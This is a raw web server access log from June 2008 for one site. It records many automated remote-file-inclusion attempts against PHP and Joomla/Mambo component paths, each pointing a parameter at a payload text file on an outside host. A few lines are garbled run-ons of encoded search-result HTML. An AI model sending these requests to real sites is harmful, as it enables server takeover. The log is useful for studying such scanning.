203.172.177.233 - - [09/Jun/2008:10:09:12 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.34.78.106 - - [09/Jun/2008:10:09:13 -0700] "GET /logs/access_071219.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:09:15 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:09:16 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:09:16 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:10:09:16 -0700] "GET /logs/access_080312.log//errors.php?error=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.22.129 - - [09/Jun/2008:10:09:18 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:09:19 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:09:20 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:09:21 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:09:21 -0700] "GET /logs/access_080429.log/index.php?ort=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.157.210 - - [09/Jun/2008:10:09:37 -0700] "GET /logs/access_080312.log//newspublish/include.php?path%5Bdocroot%5D=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.47.247.136 - - [09/Jun/2008:10:10:15 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.120.73 - - [09/Jun/2008:10:11:08 -0700] "GET /logs/access.log%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22com_linkdirectory%22&u=www.dmulk.com/logs/access.log&w=com_linkdirectory&d=NluP3ZzfQ5sM&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.myfirstskydive.com/logs/access_080513.log%22%20%3Ewww.myfirstskydive.com/logs/access_080513.log%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20configinsert.php?mosConfig_absolute_path=http:/www.peccu.org/components%20...%20HTTP/1.1%22%20404%20275%20%22-%22%20%22libwww-perl/5.803%22%20%22www.myfirstskydive.com%22%2062.128.131.80%20...%3C/div%3E%3Cspan%20class=url%3Ewww.myfirstskydive.com/logs/access_080513.log%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.selingeriestoreusa/us2:64.204.15.120.73 - - [09/Jun/2008:10:11:09 -0700] "GET /logs/access.log%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22com_linkdirectory%22&u=www.dmulk.com/logs/access.log&w=com_linkdirectory&d=NluP3ZzfQ5sM&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.myfirstskydive.com/logs/access_080513.log%22%20%3Ewww.myfirstskydive.com/logs/access_080513.log%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20configinsert.php?mosConfig_absolute_path=http:/www.peccu.org/components%20...%20HTTP/1.1%22%20404%20275%20%22-%22%20%22libwww-perl/5.803%22%20%22www.myfirstskydive.com%22%2062.128.131.80%20...%3C/div%3E%3Cspan%20class=url%3Ewww.myfirstskydive.com/logs/access_080513.log%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.sedeniseruddphotography/us204.15.120.73 - - [09/Jun/2008:10:11:09 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [09/Jun/2008:10:11:09 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.15.120.73 - - [09/Jun/2008:10:11:10 -0700] "GET /logs/access.log%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22com_linkdirectory%22&u=www.dmulk.com/logs/access.log&w=com_linkdirectory&d=NluP3ZzfQ5sM&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.myfirstskydive.com/logs/access_080513.log%22%20%3Ewww.myfirstskydive.com/logs/access_080513.log%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20configinsert.php?mosConfig_absolute_path=http:/www.peccu.org/components%20...%20HTTP/1.1%22%20404%20275%20%22-%22%20%22libwww-perl/5.803%22%20%22www.myfirstskydive.com%22%2062.128.131.80%20...%3C/div%3E%3Cspan%20class=url%3Ewww.myfirstskydive.com/logs/access_080513.log%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.sebruce_millard/us1:76.171204.15.120.73 - - [09/Jun/2008:10:11:10 -0700] "GET /logs/access.log%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22com_linkdirectory%22&u=www.dmulk.com/logs/access.log&w=com_linkdirectory&d=NluP3ZzfQ5sM&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.myfirstskydive.com/logs/access_080513.log%22%20%3Ewww.myfirstskydive.com/logs/access_080513.log%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20configinsert.php?mosConfig_absolute_path=http:/www.peccu.org/components%20...%20HTTP/1.1%22%20404%20275%20%22-%22%20%22libwww-perl/5.803%22%20%22www.myfirstskydive.com%22%2062.128.131.80%20...%3C/div%3E%3Cspan%20class=url%3Ewww.myfirstskydive.com/logs/access_080513.log%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.sekatkdd/us1:71.158.222.1866.246.185.183 - - [09/Jun/2008:10:11:41 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.246.185.183 - - [09/Jun/2008:10:11:41 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.246.185.183 - - [09/Jun/2008:10:11:41 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:10:11:55 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:10:11:56 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:10:11:56 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.235.34.216 - - [09/Jun/2008:10:12:13 -0700] "GET /logs/access_080429.log/header.php?prefix=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:10:12:16 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0046.jpg HTTP/1.1" 200 366761 "-" "Googlebot-Image/1.0" "dmulk.com"
151.1.32.12 - - [09/Jun/2008:10:12:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hmccalendar.com/youth/c?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
151.1.32.12 - - [09/Jun/2008:10:12:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hmccalendar.com/youth/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
151.1.32.12 - - [09/Jun/2008:10:12:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hmccalendar.com/youth/c?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
203.130.242.135 - - [09/Jun/2008:10:12:22 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.32.12 - - [09/Jun/2008:10:12:22 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hmccalendar.com/youth/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
203.130.242.135 - - [09/Jun/2008:10:12:22 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:12:22 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:12:23 -0700] "GET //components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:12:23 -0700] "GET /logs//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.121.209.85 - - [09/Jun/2008:10:12:36 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:10:12:40 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [09/Jun/2008:10:12:40 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://trackmania.no.sapo.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.246.185.183 - - [09/Jun/2008:10:12:42 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.246.185.183 - - [09/Jun/2008:10:12:54 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.133.173 - - [09/Jun/2008:10:12:59 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [09/Jun/2008:10:12:59 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nozyk.org/rob.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:10:13:17 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:10:13:18 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:13:23 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:13:23 -0700] "GET //components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:13:24 -0700] "GET /logs//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:13:24 -0700] "GET /logs/access_080118.log//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [09/Jun/2008:10:13:30 -0700] "GET /logs/access.log/index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [09/Jun/2008:10:13:35 -0700] "GET /index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 200 16811 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [09/Jun/2008:10:13:36 -0700] "GET /logs/index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.129 - - [09/Jun/2008:10:13:40 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.129 - - [09/Jun/2008:10:13:40 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:13:50 -0700] "GET /logs/access_080208.log//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:13:50 -0700] "GET //administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:13:50 -0700] "GET /logs//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.2.12 - - [09/Jun/2008:10:14:25 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://myowncommunity.com/smfarchons/attachments/mrneti.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [09/Jun/2008:10:14:25 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://myowncommunity.com/smfarchons/attachments/mrneti.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [09/Jun/2008:10:14:28 -0700] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://myowncommunity.com/smfarchons/attachments/mrneti.txt%0D?? HTTP/1.1" 200 16929 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:14:32 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:14:32 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:14:32 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.154.38.121 - - [09/Jun/2008:10:14:51 -0700] "GET //includes/messages.inc.php?include_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:15:14 -0700] "GET /logs/access_080118.log//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:10:15:20 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:10:15:21 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:10:15:21 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:10:15:26 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:10:15:27 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:15:29 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:10:15:30 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:10:15:31 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:10:15:31 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
168.209.97.34 - - [09/Jun/2008:10:15:32 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
70.84.182.98 - - [09/Jun/2008:10:15:50 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.172.177.233 - - [09/Jun/2008:10:16:01 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [09/Jun/2008:10:16:01 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.211.155 - - [09/Jun/2008:10:16:28 -0700] "GET /content.php?page=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.211.155 - - [09/Jun/2008:10:16:28 -0700] "GET /logs/access.log/content.php?page=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.211.155 - - [09/Jun/2008:10:16:29 -0700] "GET /logs/content.php?page=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:16:35 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:16:35 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.229.60.50 - - [09/Jun/2008:10:17:01 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:10:17:20 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:10:17:20 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:10:17:23 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:10:17:23 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:17:25 -0700] "GET /logs/access_080118.log//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:17:25 -0700] "GET //components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:17:26 -0700] "GET /logs//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:10:17:28 -0700] "GET /login.php?dir=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:17:28 -0700] "GET /logs/access_080309.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:17:28 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:17:29 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.211.155 - - [09/Jun/2008:10:17:38 -0700] "GET /logs/access_071224.log/content.php?page=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:17:41 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
